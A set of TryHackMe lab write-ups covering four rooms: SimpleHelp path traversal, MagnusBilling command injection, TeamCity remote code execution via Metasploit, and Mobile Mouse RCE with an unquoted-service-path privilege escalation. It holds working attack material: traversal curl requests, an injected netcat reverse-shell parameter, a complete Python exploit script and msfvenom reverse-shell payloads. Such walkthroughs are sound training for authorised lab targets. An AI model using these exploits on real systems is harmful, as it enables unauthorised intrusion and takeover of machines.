Try Hack Me Write-ups
Solutions to some Try Hack Me
Try Hack Me/SimpleHelp
Write-up / THM / SimpleHelp: CVE-2024-57727
by: alfreddgreat
Get the python script for POC for the vulnerability in https://github.com/imjdl/CVE-2024-57727.
root@ip-10-10-65-98:~# git clone https://github.com/imjdl/CVE-2024-57727
Change directory to the downloaded CVE folder.
root@ip-10-10-65-98:~/CVE-2024-57727# cd CVE-2024-57727/
Run the following python script.
root@ip-10-10-65-98:~/CVE-2024-57727# python3 poc.py http://10.10.32.37
Check the poc.py script
def send_path_traversal_request(url: str) -> bool: """ Send a path traversal request and get the response Args: url (str): Target url address Returns: dict: Dictionary containing response information, including status code, response content, etc. None: Returns None if request fails """ url = url + "/toolbox-resource/../resource1/../../configuration/serverconfig.xml" context = ssl._create_unverified_context() # Default request headers default_headers = { 'Accept-Encoding': 'gzip, deflate, br', 'Accept': '*/*', 'Connection': 'keep-alive' }
root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/serverconfig.xml
root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/flag.txt
root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/flag.txt
THM{9ND23PVA}
"Choose your path wisely, but your shoes comfortably."
"Traverse lightly, laugh loudly."
THM{9ND23PVA}
root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.189.219/toolbox-resource/../secmsg/../../configuration/flag.txt
root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.189.219/toolbox-resource/../secmsg/../../configuration/flag.txt
THM{X8733EEZ}
"Some paths are meant to be traversed; others just lead to a 404."
THM{X8733EEZ}
Try Hack Me/Billing
Write-up / THM / Billing
by:
Start the Virtual Machine
Run an nmap scan to the VM machine
From the nmap scan: nmap -sS -sC -sV IP_THM_VM_machine
Ports 22, 80, and 3306 are open
VM machine is a Debian Linux
Connect to port 80 using a web browser
nc -c sh 10.10.209.29 9001
10.10.233.21/mbilling/lib/icepay/icepay.php?democ=/dev/null; nc -c sh 10.10.209.29 9001
listen with nc
nc -lnvp 9001
python -c 'import os; os.system("/bin/sh")'
https://www.linkedin.com/pulse/linux-privesc-fail2ban-exploit-ahnaf-abrar-hasin/
https://eldstal.se/advisories/230327-magnusbilling.html
../ advisories/
Security advisory
A command injection vulnerability exists in magnusbilling versions 6 and 7. The vulnerability allows an unauthenticated user to execute arbitrary OS commands on the host, with the privileges of the web server.
Affected products
magnusbilling 7 up to and including commit 7af21ed620
magnusbilling 6 (all versions)
Steps to reproduce
The following proof of concept uses a harmless sleep 30
command as a payload.
- Visit
/mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%2030;ls%20a
- Observe that the page takes 30 seconds to load
- Visit
/mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%203;ls%20a
- Observe that the page takes only 3 seconds to load
Cause
A piece of demonstration code is present in lib/icepay/icepay.php
, with a call to exec()
at line 753. The parameter to exec()
includes the GET parameter democ
, which is controlled by the user.
Impact
An unauthenticated user is able to execute arbitrary OS commands. The commands run with the privileges of the web server process, typically www-data
. At a minimum, this allows an attacker to compromise the billing system and its database.
Proposed Mitigation
Remove the demo code from icepay.php
.
History
- 2023-06-26: CVE-2023-30258 assigned
- 2023-03-28: Initial report removed by maintainer
- 2023-03-27: Vulnerability fixed
- 2023-03-27: Vulnerability reported
Try Hack Me/Brains
Write-up / THM / Brains
by: alfreddgreat
Start the Virtual Machine
Run an nmap scan to the VM machine
From the nmap scan: nmap -sS -sC -sV IP_THM_VM_machine
Ports 22, 80, and 50000 are open
VM machine is an Ubuntu Linux
Connect to port 80 using a web browser
In the result of the nmap, port 50000 is also open and observing the result it is an http server
50000/tcp open ibm-db2?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 401
| TeamCity-Node-Id: MAIN_SERVER
| WWW-Authenticate: Basic realm="TeamCity"
| WWW-Authenticate: Bearer realm="TeamCity"
| Cache-Control: no-store
| Content-Type: text/plain;charset=UTF-8
| Date: Fri, 18 Oct 2024 01:48:03 GMT
| Connection: close
| Authentication required
| login manually go to "/login.html" page
| drda, ibm-db2, ibm-db2-das:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Fri, 18 Oct 2024 01:48:03 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
TeamCity-Node-Id: MAIN_SERVER
Connect to port 50000 using the web browser
The webserver has an application of Teamcity Version 2023.11.3 (build 147512)
Search the vulnerability of the Teamcity version 2023.11.3 in internet.
The application Teamcity has a vulnerability of remote code execution (RCE)
Check if the Teamcity vulnerability exist in the Metasploit Framework CVE-2024-27198 and CVE-2024-27199
Run msfconsole
Modules 3, 4, 5, 6, 7 and 8 can be used for the CVE-2024-27198 but we don't know if the application in in java, windows, linux or unix.
Detect the techniligy being used by the webserver using banner grabbing and we can use WAPPALYZER
In the wappalyzer you can observe that the Web Servers there is Apache Tomcat which means the application is running in JAVA.
Therefore in the msfconsole, we will use module 4 which is target: Java
In the msfconsole: msf6 > use 4
Then run options to see what is needed in the exploit. The column Required with the yes are obligatory.
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > options
The fields RHOSTS, RPORT should be filled up. And the LHOST should be the IP that can be reached by the VM Machine. Since the machine is in a VPN, the LHOST will be the VPN IP assigned to the Kali machine.
Set the following values
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set RHOSTS 10.10.170.24
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set RPORT 50000
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set LHOST 10.11.80.68
Note: 10.10.170.24 is the THM-VM-Machine, 50000 is the Teamcity application port and 10.11.80.68 is the VPN IP of the Kali.
Now check if the options are set successfully. Run the options command to see the set values.
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > options
Now we can run the exploit
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > run -j
If the prompt will not come out, press enter until the following comes out.
Then we run the sessions to see the session created
Meterpreter session 1 opened (10.11.80.68:4444 -> 10.10.170.24:54368) at 2024-10-17 22:38:00 -0400
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > sessions
There is 1 session created and connected to the target machine (THM-VM-machine).
Connect to the session with the command sessions 1
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > sessions 1
Now we are inside the machine with the meterpreter shell. We can walk through using the meterpreter commands or by running the command shell.
meterpreter > shell
Now we are in the target shell command. To have a prompt run a shell like the following
/bin/bash -i
Now we are inside the VM machine in the directory /opt/teamcity/TeamCity/bin
The question to answer in tryhackme.com is the following
The needed flag is in the /home directory where a user exists.
Change directory to /home directory to see who is the user: ubuntu@brains:/opt/teamcity/TeamCity/bin$ cd /home and then list the content of the directory with the ls command,
The user is ubuntu.
Change directory to the user directory and get the content of the flag.txt file.
ubuntu@brains:/home$ cd ubuntu
ubuntu@brains:/home$ ls -l
ubuntu@brains:/home$ cat flag.txt
FLAG: THM{faa9bac345709b6620a6200b484c7594}
Connect to the machine 10.10.74.225 with port 8000 using a browser.
Try Hack Me/Mouse Trap
Try Hack Me / Mouse Trap
by: alfreddgreat
root@ip-10-10-123-135:~# nmap -sS -sC -sV 10.10.162.0
root@ip-10-10-123-135:~# nmap -sS -sC -sV -O 10.10.162.0
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-30 22:19 BST
Nmap scan report for 10.10.162.0
Host is up (0.00035s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: MOUSETRAP
| NetBIOS_Domain_Name: MOUSETRAP
| NetBIOS_Computer_Name: MOUSETRAP
| DNS_Domain_Name: MOUSETRAP
| DNS_Computer_Name: MOUSETRAP
| Product_Version: 10.0.17763
|_ System_Time: 2025-03-30T21:22:42+00:00
| ssl-cert: Subject: commonName=MOUSETRAP
| Not valid before: 2024-12-08T13:53:36
|_Not valid after: 2025-06-09T13:53:36
|_ssl-date: 2025-03-30T21:23:10+00:00; 0s from scanner time.
9099/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.0 200 OK
| Server: Mobile Mouse Server
| Content-Type: text/html
| Content-Length: 326
|_ <HTML><HEAD><TITLE>Success!</TITLE><meta name="viewport" content="width=device-width,user-scalable=no" /></HEAD><BODY BGCOLOR=#000000><br><br><p style="font:12pt arial,geneva,sans-serif; text-align:center; color:green; font-weight:bold;" >The server running on "MOUSETRAP" was able to receive your request.</p></BODY></HTML>
9999/tcp open abyss?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9099-TCP:V=7.80%I=7%D=3/30%Time=67E9B591%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\
SF:x20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x203
SF:26\r\n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewport\"
SF:\x20content=\"width=device-width,user-scalable=no\"\x20/></HEAD><BODY\x
SF:20BGCOLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,sans-
SF:serif;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"\x20
SF:>The\x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20to\x
SF:20receive\x20your\x20request\.</p></BODY></HTML>\r\n")%r(FourOhFourRequ
SF:est,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x20Se
SF:rver\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x20326\r\
SF:n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewport\"\x20c
SF:ontent=\"width=device-width,user-scalable=no\"\x20/></HEAD><BODY\x20BGC
SF:OLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,sans-serif
SF:;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"\x20>The\
SF:x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20to\x20rec
SF:eive\x20your\x20request\.</p></BODY></HTML>\r\n");
MAC Address: 02:23:36:E3:FF:87 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/30%OT=135%CT=1%CU=37501%PV=Y%DS=1%DC=D%G=Y%M=022336%
OS:TM=67E9B63F%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=I%CI=I%II=
OS:I%SS=S%TS=U)OPS(O1=M5B4NW8NNS%O2=M5B4NW8NNS%O3=M5B4NW8%O4=M5B4NW8NNS%O5=
OS:M5B4NW8NNS%O6=M5B4NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF7
OS:0)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M5B4NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: MOUSETRAP, NetBIOS user: <unknown>, NetBIOS MAC: 02:23:36:e3:ff:87 (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-03-30T21:22:42
|_ start_date: N/A
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 212.34 seconds
root@ip-10-10-123-135:~# nmap --script vuln 10.10.162.0
root@ip-10-10-123-135:~# nmap --script vuln 10.10.162.0
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-30 22:04 BST
Nmap scan report for 10.10.162.0
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp open ms-wbt-server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
9099/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
9999/tcp open abyss
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 02:23:36:E3:FF:87 (Unknown)
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
Nmap done: 1 IP address (1 host up) scanned in 59.82 seconds
Using port 9099 in the browser
In the first port, version scan we see that there is a Mobile Mouse Server
Search for an exploit in the internet and the following from github appears
https://github.com/blue0x1/mobilemouse-exploit?tab=readme-ov-file
Using the V2 version: CVE-2023-31902-v2.py
# Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution v2
# Date: Apr 28, 2023
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mobilemouse.com/
# Software Link: https://www.mobilemouse.com/downloads/setup.exe
# Version: 3.6.0.4
# Tested on: Windows 10 Enterprise LTSC Build 17763
#!/usr/bin/env python3
import socket
from time import sleep
import argparse
import threading
from impacket import smbserver
def smb_server(lhost, file_to_serve):
server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
server.addShare("share", ".", "")
server.start()
help = " Mobile Mouse 3.6.0.4 Remote Code Execution "
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--target", help="Target IP", required=True)
parser.add_argument("--file", help="File name to Upload", required=True)
parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1")
args = parser.parse_args()
host = args.target
command_shell = args.file
lhost = args.lhost
port = 9099 # Default port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 256)
s.connect((host, port))
smb_server_thread = threading.Thread(target=smb_server, args=(lhost, command_shell))
smb_server_thread.start()
CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")
s.send(CONN)
run = s.recv(54)
RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")
s.send(RUN)
run = s.recv(54)
sleep(0.5)
payload = f"cmd.exe /c start /B \\\\{lhost}\\share\\{command_shell}".encode('utf-8')
hex_payload = payload.hex()
SHELL = bytearray.fromhex("4B45591E3130301E" + hex_payload + "1E04" + "4b45591e2d311e454e5445521e04")
s.send(SHELL)
shell = s.recv(96)
print("Take The rose...")
sleep(30)
s.close()
Save the file to a mousemobile.py using the code above
Now create an executable remote shell execution using the msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP_LOCAL_MACHINE LPORT=PORT_LOCAL -f exe > shell-x64.exe
Using the mousemobile.py and using the shell-x64.exe as the code to be executed.
Take note that shell-x64.exe has been created using port 446
First open a terminal and run the following command
nc -lnvp 446
Leave it open and open another terminal and now we will exploit the mouse application using the python script.
python3 mousemobile.py --target 10.10.162.0 --lhost 10.10.123.135 --file shell-x64.exe
Now with the first terminal where netcat is opened, it should have connected.
Now we have a windows terminal opened.
Get the flag in the user.txt
THM{Terry_mouse_2_rce}
Exploiting the Unquoted Path
Search the unquoted path of a service using the command below.
Using shapup.exe
C:\Users\purpletom>SharpUp.exe audit
SharpUp.exe audit
=== SharpUp: Running Privilege Escalation Checks ===
[!] Modifialbe scheduled tasks were not evaluated due to permissions.
=== Services with Unquoted Paths ===
Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program' is modifable.
Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files' is modifable.
Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files (x86)\Mobile Mouse\Mouse' is modifable.
'C:\Program Files (x86)\Mobile Mouse\Mouse' is modifable.